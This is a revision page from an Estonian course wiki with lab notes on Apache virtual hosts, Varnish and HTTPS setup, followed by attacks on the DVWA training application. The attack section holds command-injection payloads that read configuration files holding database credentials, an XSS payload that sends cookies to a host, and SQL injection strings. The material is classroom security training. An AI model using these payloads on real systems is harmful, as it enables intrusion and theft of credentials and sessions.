Virtualhost apache2 näitel: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Aelliku (talk | contribs)
Saus (talk | contribs)
Line 174: Line 174:
8.8.8.8; ls /var/tmp/
8.8.8.8; ls /var/tmp/
</source>
</source>
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:
'''session.cookie_httponly = 1'''
* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))
'''session.cookie_httponly = 0'''


==XSS==
==XSS==

Revision as of 11:44, 6 May 2013

/etc/hosts

192.168.56.101  www.planet.zz
192.168.56.101  sales.planet.zz
ping www.planet.zz

ping sales.planet.zz    


apt-get update     
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz 
vim sales.planet.zz 

a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload

Varnish

Esmaselt tõstame apache2 porti 8080

/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
service apache2 restart
netstat -lntp
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"

Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine

sub vcl_recv {

  # Add a unique header containing the client address

  remove req.http.X-Forwarded-For;

  set    req.http.X-Forwarded-For = client.ip;

  # [...]

}

service varnish restart

DVWA ründed

HTTPS konfigureerimine

ssh-keygen


Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
|            .    |
|           + .   |
|          o +    |
|           * o   |
|        S + O    |
|       ..+ + + . |
|       ...o o =  |
|        o+   o . |
|       .o.    E  |
+-----------------+

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req


sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

ServerName      www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key


a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

ID kaart

ID kaardiga autentimine Apache2 veebiserveriga


DVWA ründed

cmd exec

8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php


8.8.8.8; ls -l 
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php


Loon faili kala /var/tmp kataloogi

8.8.8.8; touch /var/tmp/kala.txt

Ning kontrollin kas fail loodi

8.8.8.8; ls /var/tmp/


Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)

; grep session.cookie_httponly /etc/php5/apache2/php.ini

Väljund:

  • kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

session.cookie_httponly = 1

  • kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

session.cookie_httponly = 0

XSS

<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>

veel XSSi

%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E

SQLi

#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --


2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --


3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --